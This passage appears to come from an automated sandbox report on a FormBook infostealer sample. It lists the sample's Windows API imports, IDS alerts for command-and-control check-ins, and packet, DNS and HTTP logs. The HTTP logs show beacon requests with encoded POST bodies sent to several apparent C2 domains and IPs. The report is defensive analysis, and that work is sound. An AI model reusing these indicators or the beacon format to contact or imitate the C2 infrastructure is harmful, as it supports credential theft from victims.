LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

                                                Possible Origin

                                                Language of compilation systemCountry where language is spokenMap
                                                EnglishGreat Britain

                                                Network Behavior

                                                Suricata IDS Alerts

                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                2024-11-22T12:42:31.928508+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44980843.205.198.2980TCP
                                                2024-11-22T12:42:34.600224+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44981543.205.198.2980TCP
                                                2024-11-22T12:42:37.256489+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44982143.205.198.2980TCP
                                                2024-11-22T12:42:46.715244+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449843172.67.220.3680TCP
                                                2024-11-22T12:42:49.383453+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449850172.67.220.3680TCP
                                                2024-11-22T12:42:52.184148+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449859172.67.220.3680TCP
                                                2024-11-22T12:43:01.932322+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449882194.245.148.18980TCP
                                                2024-11-22T12:43:04.796233+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449888194.245.148.18980TCP
                                                2024-11-22T12:43:08.086956+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449899194.245.148.18980TCP

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Nov 22, 2024 12:42:13.001437902 CET4976880192.168.2.438.47.233.21
                                                Nov 22, 2024 12:42:13.121184111 CET804976838.47.233.21192.168.2.4
                                                Nov 22, 2024 12:42:13.121288061 CET4976880192.168.2.438.47.233.21
                                                Nov 22, 2024 12:42:13.137100935 CET4976880192.168.2.438.47.233.21
                                                Nov 22, 2024 12:42:13.256855965 CET804976838.47.233.21192.168.2.4
                                                Nov 22, 2024 12:42:14.707618952 CET804976838.47.233.21192.168.2.4
                                                Nov 22, 2024 12:42:14.707645893 CET804976838.47.233.21192.168.2.4
                                                Nov 22, 2024 12:42:14.708138943 CET4976880192.168.2.438.47.233.21
                                                Nov 22, 2024 12:42:14.711889029 CET4976880192.168.2.438.47.233.21
                                                Nov 22, 2024 12:42:14.831471920 CET804976838.47.233.21192.168.2.4
                                                Nov 22, 2024 12:42:30.287194967 CET4980880192.168.2.443.205.198.29
                                                Nov 22, 2024 12:42:30.407033920 CET804980843.205.198.29192.168.2.4
                                                Nov 22, 2024 12:42:30.407120943 CET4980880192.168.2.443.205.198.29
                                                Nov 22, 2024 12:42:30.421319008 CET4980880192.168.2.443.205.198.29
                                                Nov 22, 2024 12:42:30.540931940 CET804980843.205.198.29192.168.2.4
                                                Nov 22, 2024 12:42:31.928508043 CET4980880192.168.2.443.205.198.29
                                                Nov 22, 2024 12:42:31.999907970 CET804980843.205.198.29192.168.2.4
                                                Nov 22, 2024 12:42:31.999963045 CET4980880192.168.2.443.205.198.29
                                                Nov 22, 2024 12:42:32.000138044 CET804980843.205.198.29192.168.2.4
                                                Nov 22, 2024 12:42:32.000185966 CET4980880192.168.2.443.205.198.29
                                                Nov 22, 2024 12:42:32.048166990 CET804980843.205.198.29192.168.2.4
                                                Nov 22, 2024 12:42:32.048228979 CET4980880192.168.2.443.205.198.29
                                                Nov 22, 2024 12:42:32.946918964 CET4981580192.168.2.443.205.198.29
                                                Nov 22, 2024 12:42:33.067173958 CET804981543.205.198.29192.168.2.4
                                                Nov 22, 2024 12:42:33.067271948 CET4981580192.168.2.443.205.198.29
                                                Nov 22, 2024 12:42:33.086255074 CET4981580192.168.2.443.205.198.29
                                                Nov 22, 2024 12:42:33.205873966 CET804981543.205.198.29192.168.2.4
                                                Nov 22, 2024 12:42:34.600224018 CET4981580192.168.2.443.205.198.29
                                                Nov 22, 2024 12:42:34.668154001 CET804981543.205.198.29192.168.2.4
                                                Nov 22, 2024 12:42:34.668239117 CET804981543.205.198.29192.168.2.4
                                                Nov 22, 2024 12:42:34.668322086 CET4981580192.168.2.443.205.198.29
                                                Nov 22, 2024 12:42:34.668322086 CET4981580192.168.2.443.205.198.29
                                                Nov 22, 2024 12:42:34.721312046 CET804981543.205.198.29192.168.2.4
                                                Nov 22, 2024 12:42:34.723205090 CET4981580192.168.2.443.205.198.29
                                                Nov 22, 2024 12:42:35.618840933 CET4982180192.168.2.443.205.198.29
                                                Nov 22, 2024 12:42:35.739454985 CET804982143.205.198.29192.168.2.4
                                                Nov 22, 2024 12:42:35.739661932 CET4982180192.168.2.443.205.198.29
                                                Nov 22, 2024 12:42:35.754379034 CET4982180192.168.2.443.205.198.29
                                                Nov 22, 2024 12:42:35.874264002 CET804982143.205.198.29192.168.2.4
                                                Nov 22, 2024 12:42:35.874335051 CET804982143.205.198.29192.168.2.4
                                                Nov 22, 2024 12:42:35.874388933 CET804982143.205.198.29192.168.2.4
                                                Nov 22, 2024 12:42:35.874408007 CET804982143.205.198.29192.168.2.4
                                                Nov 22, 2024 12:42:35.874432087 CET804982143.205.198.29192.168.2.4
                                                Nov 22, 2024 12:42:35.874444008 CET804982143.205.198.29192.168.2.4
                                                Nov 22, 2024 12:42:35.874485970 CET804982143.205.198.29192.168.2.4
                                                Nov 22, 2024 12:42:35.874506950 CET804982143.205.198.29192.168.2.4
                                                Nov 22, 2024 12:42:35.874552965 CET804982143.205.198.29192.168.2.4
                                                Nov 22, 2024 12:42:37.256489038 CET4982180192.168.2.443.205.198.29
                                                Nov 22, 2024 12:42:37.269301891 CET804982143.205.198.29192.168.2.4
                                                Nov 22, 2024 12:42:37.269366980 CET804982143.205.198.29192.168.2.4
                                                Nov 22, 2024 12:42:37.269481897 CET4982180192.168.2.443.205.198.29
                                                Nov 22, 2024 12:42:37.269521952 CET4982180192.168.2.443.205.198.29
                                                Nov 22, 2024 12:42:37.376121998 CET804982143.205.198.29192.168.2.4
                                                Nov 22, 2024 12:42:37.376183033 CET4982180192.168.2.443.205.198.29
                                                Nov 22, 2024 12:42:38.275856972 CET4982780192.168.2.443.205.198.29
                                                Nov 22, 2024 12:42:38.395473957 CET804982743.205.198.29192.168.2.4
                                                Nov 22, 2024 12:42:38.395572901 CET4982780192.168.2.443.205.198.29
                                                Nov 22, 2024 12:42:38.404337883 CET4982780192.168.2.443.205.198.29
                                                Nov 22, 2024 12:42:38.523931980 CET804982743.205.198.29192.168.2.4
                                                Nov 22, 2024 12:42:39.874555111 CET804982743.205.198.29192.168.2.4
                                                Nov 22, 2024 12:42:39.874614000 CET804982743.205.198.29192.168.2.4
                                                Nov 22, 2024 12:42:39.874773979 CET4982780192.168.2.443.205.198.29
                                                Nov 22, 2024 12:42:39.883696079 CET4982780192.168.2.443.205.198.29
                                                Nov 22, 2024 12:42:40.003241062 CET804982743.205.198.29192.168.2.4
                                                Nov 22, 2024 12:42:45.233834028 CET4984380192.168.2.4172.67.220.36
                                                Nov 22, 2024 12:42:45.353446960 CET8049843172.67.220.36192.168.2.4
                                                Nov 22, 2024 12:42:45.354249001 CET4984380192.168.2.4172.67.220.36
                                                Nov 22, 2024 12:42:45.372070074 CET4984380192.168.2.4172.67.220.36
                                                Nov 22, 2024 12:42:45.493594885 CET8049843172.67.220.36192.168.2.4
                                                Nov 22, 2024 12:42:46.715147018 CET8049843172.67.220.36192.168.2.4
                                                Nov 22, 2024 12:42:46.715178013 CET8049843172.67.220.36192.168.2.4
                                                Nov 22, 2024 12:42:46.715244055 CET4984380192.168.2.4172.67.220.36
                                                Nov 22, 2024 12:42:46.715779066 CET8049843172.67.220.36192.168.2.4
                                                Nov 22, 2024 12:42:46.715914965 CET8049843172.67.220.36192.168.2.4
                                                Nov 22, 2024 12:42:46.715967894 CET4984380192.168.2.4172.67.220.36
                                                Nov 22, 2024 12:42:46.881462097 CET4984380192.168.2.4172.67.220.36
                                                Nov 22, 2024 12:42:47.899976015 CET4985080192.168.2.4172.67.220.36
                                                Nov 22, 2024 12:42:48.019548893 CET8049850172.67.220.36192.168.2.4
                                                Nov 22, 2024 12:42:48.019642115 CET4985080192.168.2.4172.67.220.36
                                                Nov 22, 2024 12:42:48.032150030 CET4985080192.168.2.4172.67.220.36
                                                Nov 22, 2024 12:42:48.152157068 CET8049850172.67.220.36192.168.2.4
                                                Nov 22, 2024 12:42:49.383327007 CET8049850172.67.220.36192.168.2.4
                                                Nov 22, 2024 12:42:49.383393049 CET8049850172.67.220.36192.168.2.4
                                                Nov 22, 2024 12:42:49.383452892 CET4985080192.168.2.4172.67.220.36
                                                Nov 22, 2024 12:42:49.383929014 CET8049850172.67.220.36192.168.2.4
                                                Nov 22, 2024 12:42:49.383981943 CET4985080192.168.2.4172.67.220.36
                                                Nov 22, 2024 12:42:49.537841082 CET4985080192.168.2.4172.67.220.36
                                                Nov 22, 2024 12:42:50.642081022 CET4985980192.168.2.4172.67.220.36
                                                Nov 22, 2024 12:42:50.761821985 CET8049859172.67.220.36192.168.2.4
                                                Nov 22, 2024 12:42:50.761966944 CET4985980192.168.2.4172.67.220.36
                                                Nov 22, 2024 12:42:50.814327955 CET4985980192.168.2.4172.67.220.36
                                                Nov 22, 2024 12:42:50.933983088 CET8049859172.67.220.36192.168.2.4
                                                Nov 22, 2024 12:42:50.934242010 CET8049859172.67.220.36192.168.2.4
                                                Nov 22, 2024 12:42:50.934278965 CET8049859172.67.220.36192.168.2.4
                                                Nov 22, 2024 12:42:50.934329987 CET8049859172.67.220.36192.168.2.4
                                                Nov 22, 2024 12:42:50.934360981 CET8049859172.67.220.36192.168.2.4
                                                Nov 22, 2024 12:42:50.934458017 CET8049859172.67.220.36192.168.2.4
                                                Nov 22, 2024 12:42:50.934484959 CET8049859172.67.220.36192.168.2.4
                                                Nov 22, 2024 12:42:50.934552908 CET8049859172.67.220.36192.168.2.4
                                                Nov 22, 2024 12:42:50.934582949 CET8049859172.67.220.36192.168.2.4
                                                Nov 22, 2024 12:42:52.183542967 CET8049859172.67.220.36192.168.2.4
                                                Nov 22, 2024 12:42:52.184073925 CET8049859172.67.220.36192.168.2.4
                                                Nov 22, 2024 12:42:52.184108973 CET8049859172.67.220.36192.168.2.4
                                                Nov 22, 2024 12:42:52.184148073 CET4985980192.168.2.4172.67.220.36
                                                Nov 22, 2024 12:42:52.184230089 CET4985980192.168.2.4172.67.220.36
                                                Nov 22, 2024 12:42:52.334660053 CET4985980192.168.2.4172.67.220.36
                                                Nov 22, 2024 12:42:53.397495031 CET4986680192.168.2.4172.67.220.36
                                                Nov 22, 2024 12:42:53.518520117 CET8049866172.67.220.36192.168.2.4
                                                Nov 22, 2024 12:42:53.518625975 CET4986680192.168.2.4172.67.220.36
                                                Nov 22, 2024 12:42:53.569525003 CET4986680192.168.2.4172.67.220.36
                                                Nov 22, 2024 12:42:53.689410925 CET8049866172.67.220.36192.168.2.4
                                                Nov 22, 2024 12:42:54.964524984 CET8049866172.67.220.36192.168.2.4
                                                Nov 22, 2024 12:42:54.964586020 CET8049866172.67.220.36192.168.2.4
                                                Nov 22, 2024 12:42:54.964608908 CET8049866172.67.220.36192.168.2.4
                                                Nov 22, 2024 12:42:54.964627981 CET8049866172.67.220.36192.168.2.4
                                                Nov 22, 2024 12:42:54.964639902 CET8049866172.67.220.36192.168.2.4
                                                Nov 22, 2024 12:42:54.964651108 CET8049866172.67.220.36192.168.2.4
                                                Nov 22, 2024 12:42:54.964663982 CET8049866172.67.220.36192.168.2.4
                                                Nov 22, 2024 12:42:54.964740038 CET4986680192.168.2.4172.67.220.36
                                                Nov 22, 2024 12:42:54.964772940 CET8049866172.67.220.36192.168.2.4
                                                Nov 22, 2024 12:42:54.964817047 CET8049866172.67.220.36192.168.2.4
                                                Nov 22, 2024 12:42:54.964817047 CET4986680192.168.2.4172.67.220.36
                                                Nov 22, 2024 12:42:54.964829922 CET8049866172.67.220.36192.168.2.4
                                                Nov 22, 2024 12:42:54.964868069 CET4986680192.168.2.4172.67.220.36
                                                Nov 22, 2024 12:42:54.964900970 CET4986680192.168.2.4172.67.220.36
                                                Nov 22, 2024 12:42:54.976654053 CET8049866172.67.220.36192.168.2.4
                                                Nov 22, 2024 12:42:54.977082968 CET4986680192.168.2.4172.67.220.36
                                                Nov 22, 2024 12:42:54.979670048 CET4986680192.168.2.4172.67.220.36
                                                Nov 22, 2024 12:42:55.099241972 CET8049866172.67.220.36192.168.2.4
                                                Nov 22, 2024 12:43:00.460308075 CET4988280192.168.2.4194.245.148.189
                                                Nov 22, 2024 12:43:00.580061913 CET8049882194.245.148.189192.168.2.4
                                                Nov 22, 2024 12:43:00.580172062 CET4988280192.168.2.4194.245.148.189
                                                Nov 22, 2024 12:43:00.595241070 CET4988280192.168.2.4194.245.148.189
                                                Nov 22, 2024 12:43:00.716284037 CET8049882194.245.148.189192.168.2.4
                                                Nov 22, 2024 12:43:01.931945086 CET8049882194.245.148.189192.168.2.4
                                                Nov 22, 2024 12:43:01.932248116 CET8049882194.245.148.189192.168.2.4
                                                Nov 22, 2024 12:43:01.932322025 CET4988280192.168.2.4194.245.148.189
                                                Nov 22, 2024 12:43:02.100275993 CET4988280192.168.2.4194.245.148.189
                                                Nov 22, 2024 12:43:03.417714119 CET4988880192.168.2.4194.245.148.189
                                                Nov 22, 2024 12:43:03.537348032 CET8049888194.245.148.189192.168.2.4
                                                Nov 22, 2024 12:43:03.537434101 CET4988880192.168.2.4194.245.148.189
                                                Nov 22, 2024 12:43:03.552467108 CET4988880192.168.2.4194.245.148.189
                                                Nov 22, 2024 12:43:03.672174931 CET8049888194.245.148.189192.168.2.4
                                                Nov 22, 2024 12:43:04.796037912 CET8049888194.245.148.189192.168.2.4
                                                Nov 22, 2024 12:43:04.796160936 CET8049888194.245.148.189192.168.2.4
                                                Nov 22, 2024 12:43:04.796232939 CET4988880192.168.2.4194.245.148.189
                                                Nov 22, 2024 12:43:05.069042921 CET4988880192.168.2.4194.245.148.189
                                                Nov 22, 2024 12:43:06.525823116 CET4989980192.168.2.4194.245.148.189
                                                Nov 22, 2024 12:43:06.645481110 CET8049899194.245.148.189192.168.2.4
                                                Nov 22, 2024 12:43:06.647138119 CET4989980192.168.2.4194.245.148.189
                                                Nov 22, 2024 12:43:06.668729067 CET4989980192.168.2.4194.245.148.189
                                                Nov 22, 2024 12:43:06.788604975 CET8049899194.245.148.189192.168.2.4
                                                Nov 22, 2024 12:43:06.788692951 CET8049899194.245.148.189192.168.2.4
                                                Nov 22, 2024 12:43:06.788722038 CET8049899194.245.148.189192.168.2.4
                                                Nov 22, 2024 12:43:06.788753986 CET8049899194.245.148.189192.168.2.4
                                                Nov 22, 2024 12:43:06.788863897 CET8049899194.245.148.189192.168.2.4
                                                Nov 22, 2024 12:43:06.788896084 CET8049899194.245.148.189192.168.2.4
                                                Nov 22, 2024 12:43:06.788989067 CET8049899194.245.148.189192.168.2.4
                                                Nov 22, 2024 12:43:06.789020061 CET8049899194.245.148.189192.168.2.4
                                                Nov 22, 2024 12:43:06.789067030 CET8049899194.245.148.189192.168.2.4
                                                Nov 22, 2024 12:43:08.086833000 CET8049899194.245.148.189192.168.2.4
                                                Nov 22, 2024 12:43:08.086872101 CET8049899194.245.148.189192.168.2.4
                                                Nov 22, 2024 12:43:08.086956024 CET4989980192.168.2.4194.245.148.189

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Nov 22, 2024 12:42:12.272578955 CET5286453192.168.2.41.1.1.1
                                                Nov 22, 2024 12:42:12.994539976 CET53528641.1.1.1192.168.2.4
                                                Nov 22, 2024 12:42:29.776873112 CET5845053192.168.2.41.1.1.1
                                                Nov 22, 2024 12:42:30.272712946 CET53584501.1.1.1192.168.2.4
                                                Nov 22, 2024 12:42:44.900434971 CET6404153192.168.2.41.1.1.1
                                                Nov 22, 2024 12:42:45.231585026 CET53640411.1.1.1192.168.2.4
                                                Nov 22, 2024 12:43:00.037123919 CET5363353192.168.2.41.1.1.1
                                                Nov 22, 2024 12:43:00.457616091 CET53536331.1.1.1192.168.2.4

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Nov 22, 2024 12:42:12.272578955 CET192.168.2.41.1.1.10xfa7fStandard query (0)www.qqa79.topA (IP address)IN (0x0001)false
                                                Nov 22, 2024 12:42:29.776873112 CET192.168.2.41.1.1.10x96e3Standard query (0)www.1secondlending.oneA (IP address)IN (0x0001)false
                                                Nov 22, 2024 12:42:44.900434971 CET192.168.2.41.1.1.10x1a2aStandard query (0)www.supernutra01.onlineA (IP address)IN (0x0001)false
                                                Nov 22, 2024 12:43:00.037123919 CET192.168.2.41.1.1.10x37dbStandard query (0)www.wine-drinkers.clubA (IP address)IN (0x0001)false

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Nov 22, 2024 12:42:12.994539976 CET1.1.1.1192.168.2.40xfa7fNo error (0)www.qqa79.topqqa79.topCNAME (Canonical name)IN (0x0001)false
                                                Nov 22, 2024 12:42:12.994539976 CET1.1.1.1192.168.2.40xfa7fNo error (0)qqa79.top38.47.233.21A (IP address)IN (0x0001)false
                                                Nov 22, 2024 12:42:30.272712946 CET1.1.1.1192.168.2.40x96e3No error (0)www.1secondlending.one43.205.198.29A (IP address)IN (0x0001)false
                                                Nov 22, 2024 12:42:45.231585026 CET1.1.1.1192.168.2.40x1a2aNo error (0)www.supernutra01.online172.67.220.36A (IP address)IN (0x0001)false
                                                Nov 22, 2024 12:42:45.231585026 CET1.1.1.1192.168.2.40x1a2aNo error (0)www.supernutra01.online104.21.24.198A (IP address)IN (0x0001)false
                                                Nov 22, 2024 12:43:00.457616091 CET1.1.1.1192.168.2.40x37dbNo error (0)www.wine-drinkers.club194.245.148.189A (IP address)IN (0x0001)false

                                                HTTP Request Dependency Graph

                                                • www.qqa79.top
                                                • www.1secondlending.one
                                                • www.supernutra01.online
                                                • www.wine-drinkers.club

                                                HTTP Packets

                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.44976838.47.233.21804548C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 22, 2024 12:42:13.137100935 CET444OUTGET /mz0w/?qjBT=BfTHe4BP_zkdflN&AFF=uMzU0JGK22aEYJLN9gIRRbcx6PQvWyWv0SPCs66KRtTFzrJJ373CiBnwq6iLrm6CBfWGplZZf3wVkFmev9wws6pM55HNj3BAq/9ra29WeR04lUyUIOcydT8= HTTP/1.1
                                                Host: www.qqa79.top
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Language: en-us
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36
                                                Nov 22, 2024 12:42:14.707618952 CET691INHTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Fri, 22 Nov 2024 11:42:14 GMT
                                                Content-Type: text/html
                                                Content-Length: 548
                                                Connection: close
                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                1192.168.2.44980843.205.198.29804548C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 22, 2024 12:42:30.421319008 CET725OUTPOST /6pwo/ HTTP/1.1
                                                Host: www.1secondlending.one
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Language: en-us
                                                Accept-Encoding: gzip, deflate, br
                                                Content-Length: 200
                                                Cache-Control: max-age=0
                                                Connection: close
                                                Content-Type: application/x-www-form-urlencoded
                                                Origin: http://www.1secondlending.one
                                                Referer: http://www.1secondlending.one/6pwo/
                                                User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36
                                                Data Raw: 41 46 46 3d 44 65 77 72 42 73 32 6d 54 39 6c 6d 71 53 30 68 38 78 6f 2f 46 68 77 57 47 42 70 4b 5a 57 54 4e 50 78 35 6e 73 32 31 56 41 55 6b 6f 62 58 71 71 64 5a 45 48 53 51 4e 7a 6c 79 46 4d 68 37 69 6b 39 2f 4f 64 72 48 41 61 4d 6b 41 70 41 52 62 65 75 55 6e 4f 6a 32 6f 30 62 45 72 51 73 41 4d 41 75 39 32 55 4a 41 6b 6d 76 37 63 4a 50 38 4c 6a 75 6a 79 62 56 76 61 63 51 75 6c 79 67 38 63 30 36 70 59 6f 41 75 33 37 65 6e 6a 69 67 6f 50 45 5a 38 63 68 6c 49 65 57 43 4d 6b 65 55 53 58 79 73 46 69 32 43 72 48 35 36 58 39 6f 6f 42 67 2b 52 6a 4b 34 67 51 45 2f 2b 4a 78 50 70 70 59 67 52 41 3d 3d
                                                Data Ascii: AFF=DewrBs2mT9lmqS0h8xo/FhwWGBpKZWTNPx5ns21VAUkobXqqdZEHSQNzlyFMh7ik9/OdrHAaMkApARbeuUnOj2o0bErQsAMAu92UJAkmv7cJP8LjujybVvacQulyg8c06pYoAu37enjigoPEZ8chlIeWCMkeUSXysFi2CrH56X9ooBg+RjK4gQE/+JxPppYgRA==
                                                Nov 22, 2024 12:42:31.999907970 CET691INHTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Fri, 22 Nov 2024 11:42:31 GMT
                                                Content-Type: text/html
                                                Content-Length: 548
                                                Connection: close
                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                2192.168.2.44981543.205.198.29804548C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 22, 2024 12:42:33.086255074 CET745OUTPOST /6pwo/ HTTP/1.1
                                                Host: www.1secondlending.one
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Language: en-us
                                                Accept-Encoding: gzip, deflate, br
                                                Content-Length: 220
                                                Cache-Control: max-age=0
                                                Connection: close
                                                Content-Type: application/x-www-form-urlencoded
                                                Origin: http://www.1secondlending.one
